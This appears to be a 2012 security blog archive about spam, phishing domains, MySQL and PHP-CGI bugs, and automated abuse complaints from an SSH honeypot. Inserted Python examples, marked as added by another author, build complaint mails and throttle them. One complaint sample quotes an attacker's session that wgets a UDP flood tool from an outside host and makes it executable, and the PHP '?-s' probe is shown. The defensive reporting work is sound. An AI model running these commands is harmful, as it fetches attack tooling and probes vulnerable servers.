Archive for the ‘Allgemein’ Category
MySQL-Bug
Monday, June 11th, 2012
As Heise reported, there is a possible login bug in MySQL: enough login attempts lead to a successful login without a valid password. At least some distributions are vulnerable (reports from “hetzner” vserver customers).
MAAWG
Saturday, June 2nd, 2012
Next week the 25th MAAWG meeting will take place in Berlin.
Let’s see what news can be learned there.
phish-run
Friday, May 25th, 2012
This morning at 10:28 a.m. a new domain got created:
Updated Date: 25-may-2012
Creation Date: 25-may-2012
Expiration Date: 25-may-2013
Same day, a few hours later:
No match for “domain”.
>>> Last update of whois database: Fri, 25 May 2012 14:37:56 UTC <<<
So much work for the spammer:
and after about 50 clicks the domain was already removed..
money earned? .. none 🙂
Mini Moog
Wednesday, May 23rd, 2012
I am very impressed by the emulation of the “Mini Moog” synthesizer presented as Google’s “Doodle” of today – including a 4-track recorder .. wow!
I remember the times when I actually played a Mini Moog back in the 70’s 🙂
php-bug
Friday, May 4th, 2012
If you run PHP in CGI mode you are probably vulnerable to a newly found bug:
Heise: Gefahr-durch-offene-PHP-Luecke
Adding parameters like http://localhost/index.php?-s
to a URL can show the source code or even inject or run parameters in the shell.
Until an update exists it might be wise to filter out some string elements (like “-” without “=”):
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]
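The rewrite rule above only helps if it catches exactly the query strings that the web server would turn into command-line arguments for php-cgi. As an added example (not part of the original post, and not code from Heise or the PHP project), the following Python script models the CGI argument rule from RFC 3875 next to the post's RewriteCond and runs both over constructed query strings; the sample strings and all function names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample query strings (not from the original post). Each entry is the
# raw QUERY_STRING exactly as the web server sees it, before any URL decoding.
SAMPLE_QUERY_STRINGS = [
    "-s",             # the case named in the post
    "%2Ds",           # the same option with the dash percent-encoded
    "-h+x",           # two arguments, split on '+'
    "%2ds%3Dfoo",     # '=' present only in encoded form, so still argv-style
    "page=1",         # ordinary form-style query string
    "-s&x=1",         # contains a literal '=', so never turned into argv
    "a+b",            # argv-style but not an option
    "",               # no query string at all
]

# The RewriteCond pattern from the post; the [NC] flag becomes re.IGNORECASE.
REWRITE_COND = re.compile(r"^(%2d|-)[^=]+$", re.IGNORECASE)


def cgi_argv(query_string):
    """Model of the CGI argument rule (RFC 3875, section 4.4): when QUERY_STRING
    contains no unencoded '=', the server splits it on '+' and URL-decodes each
    piece into a command-line argument for the CGI program. Otherwise the
    program only gets the QUERY_STRING environment variable and no argv."""
    if query_string == "" or "=" in query_string:
        return []
    return [unquote(piece) for piece in query_string.split("+")]


def reaches_interpreter_as_option(query_string):
    """True when the first decoded argument would look like an interpreter option."""
    argv = cgi_argv(query_string)
    return bool(argv) and argv[0].startswith("-")


def blocked_by_rewrite(query_string):
    """True when the post's RewriteCond matches, i.e. the RewriteRule would
    rewrite the request with an empty query string ('$1?')."""
    return REWRITE_COND.match(query_string) is not None


def filter_report(query_strings):
    """Return {query: (would_become_an_option, blocked_by_rule)} per sample."""
    return {q: (reaches_interpreter_as_option(q), blocked_by_rewrite(q))
            for q in query_strings}


if __name__ == "__main__":
    for q, (dangerous, blocked) in filter_report(SAMPLE_QUERY_STRINGS).items():
        print(f"{q!r:16} argv-option={dangerous!s:5} blocked={blocked}")
```

The `$1?` substitution keeps the path but replaces the query string with an empty one, so a matching request still reaches index.php, just without arguments. Note that the `=` test in both the CGI rule and the regex is on the raw, undecoded query string: `%3D` does not count, which is why the pattern still matches `%2ds%3Dfoo` and why the two checks agree on every sample.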
new TLDs: ICANN TAS portal down
Thursday, April 12th, 2012
Just a few hours before the deadline for submitting new applications passes, the online portal TAS for submitting them broke down..
12 April 2012: Application window closes at 23:59 UTC on 12 April 2012
The database behind it is obviously not stress-tested or poorly designed.
Funny that ICANN demands detailed technical expertise from applicants but fails when data is really submitted.
Quote from the ICANN page:
ICANN constantly monitors the performance of the TLD Application System (TAS). Recently, we received a report of unusual behavior with the operation of the TAS system. We then identified a technical issue with the TAS system software.
ICANN is taking the most conservative approach possible to protect all applicants and allow adequate time to resolve the issue. Therefore, TAS will be shut down until Tuesday at 23:59 UTC - unless otherwise notified before that time.
In order to ensure all applicants have sufficient time to complete their applications during the disruption, the application window will remain open until 23:59 UTC on Friday, 20 April 2012.
We apologize for any inconvenience this has caused. If you have any questions, please contact the gTLD Customer Service Center (CSC) via the CSC portal.
Tor exit node used for attack
Wednesday, March 21st, 2012
One recent reply to a kippo attack complaint explained that the attacking IP is a Tor exit node.
Of course there is no way for us to find the real attacker when he/she is using Tor for making this attack. Sad that this important service is abused in this way.
The system you have identified (cs-tor.bu.edu / 204.8.156.142) is an exit node on the Tor network. Tor is a distributed cryptographic anonymizing proxy service. The network traffic you detected was merely relayed through this system, and did not originate there. It is not possible to trace these connections back to their original source.
sshd complaints – update
Wednesday, March 14th, 2012
The automatic complaint mechanism is now active. An X-ARF complaint is generated for each session where a successful login into the kippo honeypot produced some recorded commands. The email address the complaint is sent to is determined as always: check our own database, check the RIPE website and check abusix.
Here is an example of the second MIME part:
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="report.yaml"
---
Reported-From: spamtrap@netcologne.de
Category: abuse
Report-Type: login-attack
Destination-System: kippo – sshd honeypot
User-Agent: PHREAK 1.3
Report-ID: 2faf4f486d7f11e18949797f346be17f@netcologne.de
Date: 2012-03-14 03:45:28
Service: sshd
Port: 22
Source: 89.129.**.** (obfuscated)
Source-Type: ipv4
Attachment: text/plain
Schema-URL: http://www.x-arf.org/schema/abuse_login-attack_0.1.2.json
Version: 1.0.1
and the third MIME part looks like this:
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="command.txt"
recorded commands during this session:
w
uname -a
wget http://root-arhive.at.ua/flood/udp.tgz
tar zxvf udp.tgz
rm -rf udp.tgz
chmod +x *
--===============0648269240==--
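To show how the parts above fit together, here is an added Python example (my own code, not the author's reporting tool) that assembles a complaint in the same layout: a human-readable first part, the machine-readable report.yaml as second part with the fields shown above, and the recorded commands as command.txt in the third part. The reporting address, the session data and the User-Agent string are constructed placeholders, and the X-ARF and Auto-Submitted mail headers are my assumption about what an X-ARF receiver expects.

```python
import datetime
import uuid
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Constructed sample session (not the honeypot data from the post).
SAMPLE_SOURCE_IP = "192.0.2.77"
SAMPLE_TIME = datetime.datetime(2012, 3, 14, 3, 45, 28)
SAMPLE_COMMANDS = ["w", "uname -a", "cat /proc/cpuinfo"]

REPORTER = "spamtrap@example.invalid"   # hypothetical reporting address
SCHEMA_URL = "http://www.x-arf.org/schema/abuse_login-attack_0.1.2.json"


def report_yaml(source_ip, when, report_id, reporter=REPORTER):
    """Build the machine-readable part with the same keys as in the post."""
    lines = [
        "---",
        f"Reported-From: {reporter}",
        "Category: abuse",
        "Report-Type: login-attack",
        "Destination-System: kippo - sshd honeypot",
        "User-Agent: example-reporter 0.1",   # hypothetical tool name
        f"Report-ID: {report_id}",
        f"Date: {when:%Y-%m-%d %H:%M:%S}",
        "Service: sshd",
        "Port: 22",
        f"Source: {source_ip}",
        "Source-Type: ipv4",
        "Attachment: text/plain",
        f"Schema-URL: {SCHEMA_URL}",
        "Version: 1.0.1",
    ]
    return "\n".join(lines) + "\n"


def build_complaint(source_ip, when, commands, to_addr, reporter=REPORTER):
    """Return a three-part multipart/mixed message in X-ARF layout."""
    report_id = f"{uuid.uuid4().hex}@{reporter.split('@')[1]}"
    msg = MIMEMultipart("mixed")
    msg["From"] = reporter
    msg["To"] = to_addr
    msg["Subject"] = f"abuse report about {source_ip} - {when:%Y-%m-%d}"
    msg["X-ARF"] = "YES"                     # assumption: marker header for X-ARF mails
    msg["Auto-Submitted"] = "auto-generated"  # assumption: mark as machine-generated

    # Part 1: human-readable summary for an abuse desk without an X-ARF parser.
    msg.attach(MIMEText(
        f"Successful logins and commands from {source_ip} were recorded "
        "on our ssh honeypot. Details follow in machine-readable form.\n",
        "plain", "utf-8"))

    # Part 2: the YAML report, named report.yaml as in the post.
    yaml_part = MIMEText(report_yaml(source_ip, when, report_id, reporter), "plain", "utf-8")
    yaml_part.set_param("name", "report.yaml")
    msg.attach(yaml_part)

    # Part 3: the evidence, i.e. the commands recorded during the session.
    evidence = "recorded commands during this session:\n" + "\n".join(commands) + "\n"
    cmd_part = MIMEText(evidence, "plain", "utf-8")
    cmd_part.set_param("name", "command.txt")
    msg.attach(cmd_part)
    return msg


def report_fields(msg):
    """Parse the 'Key: value' lines of the second part back into a dict."""
    part = msg.get_payload()[1]
    fields = {}
    for line in part.get_payload(decode=True).decode("utf-8").splitlines():
        if ": " in line:
            key, value = line.split(": ", 1)
            fields[key] = value
    return fields


if __name__ == "__main__":
    complaint = build_complaint(SAMPLE_SOURCE_IP, SAMPLE_TIME, SAMPLE_COMMANDS,
                                "abuse@example.invalid")
    print(complaint.as_string())
```

Sending is left to the caller (for example `smtplib.SMTP(...).send_message(complaint)`), so the builder can be unit-tested without a mail server; `report_fields()` is the reverse direction and is what a receiving abuse desk would do with the second part.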
sshd-complaints
Friday, March 9th, 2012
I am pretty close to starting to send out complaints for successful sshd logins on my kippo honeypot. The X-ARF part is ready. I decided to add the recorded commands in the 3rd MIME part. The ttylog could also be useful, but the receiver of the complaint is probably not so interested in starting the playlog utility for each complaint.
I still need to implement a database check so that receivers only get a handful of complaints and are not overwhelmed by the number of complaints..
Additionally the caught IPs will be added to our blacklist, just like in the attacks caught by nepenthes.
Dionaea attacks will come next 🙂
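The "database check" planned above, as an added example (my own code, not the author's implementation): this Python class keeps a per-recipient record of sent complaints in SQLite and lets a complaint go out only while the abuse contact has received fewer than a fixed number inside a sliding window. Every session is still recorded, so the honeypot's own records stay complete. The limit of five per day, the recipient address and the sample sessions are constructed values.

```python
import sqlite3
from datetime import datetime, timedelta

# Hypothetical policy: how many complaints one abuse contact gets per window.
DEFAULT_MAX_PER_WINDOW = 5
DEFAULT_WINDOW = timedelta(days=1)


class ComplaintThrottle:
    """Per-recipient cap on outgoing complaints, backed by a small SQLite table.

    record() stores every attack session (delivered or not) and answers True
    only while the recipient has received fewer than max_per_window complaints
    inside the sliding window ending at the session's timestamp."""

    def __init__(self, path=":memory:", max_per_window=DEFAULT_MAX_PER_WINDOW,
                 window=DEFAULT_WINDOW):
        self.db = sqlite3.connect(path)
        self.db.execute(
            "CREATE TABLE IF NOT EXISTS complaints ("
            " recipient TEXT NOT NULL, source_ip TEXT NOT NULL,"
            " sent_at TEXT NOT NULL, delivered INTEGER NOT NULL)")
        self.max_per_window = max_per_window
        self.window = window

    def delivered_count(self, recipient, now):
        """Complaints actually delivered to recipient within the window."""
        since = (now - self.window).isoformat()   # ISO strings sort chronologically
        row = self.db.execute(
            "SELECT COUNT(*) FROM complaints"
            " WHERE recipient = ? AND delivered = 1 AND sent_at >= ?",
            (recipient, since)).fetchone()
        return row[0]

    def record(self, recipient, source_ip, now):
        """Record one attack session; return True if a complaint should be sent."""
        deliver = self.delivered_count(recipient, now) < self.max_per_window
        self.db.execute(
            "INSERT INTO complaints VALUES (?, ?, ?, ?)",
            (recipient, source_ip, now.isoformat(), int(deliver)))
        self.db.commit()
        return deliver


def simulate(throttle, recipient, sessions):
    """sessions: list of (timestamp, source_ip); returns the send decisions."""
    return [throttle.record(recipient, ip, ts) for ts, ip in sessions]


# Constructed sample: seven sessions within half an hour, then one the next day.
SAMPLE_RECIPIENT = "abuse@example.invalid"
SAMPLE_SESSIONS = [
    (datetime(2012, 3, 9, 10, i * 5), "192.0.2.%d" % (10 + i)) for i in range(7)
] + [(datetime(2012, 3, 10, 12, 0), "192.0.2.99")]


if __name__ == "__main__":
    throttle = ComplaintThrottle()
    for (ts, ip), decision in zip(SAMPLE_SESSIONS,
                                  simulate(throttle, SAMPLE_RECIPIENT, SAMPLE_SESSIONS)):
        print(ts, ip, "send" if decision else "suppressed")
```

Suppressed sessions are still in the table, so the blacklist step described in the post (and a later digest, if the receiver asks for one) can be fed from the same data; only the outgoing mail is rate-limited.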
projecthoneypot.org
Thursday, January 26th, 2012
Today I received a notification from projecthoneypot.org that one of my donated spamtrap domains helped to catch a new harvester. Feels good to be able to help 🙂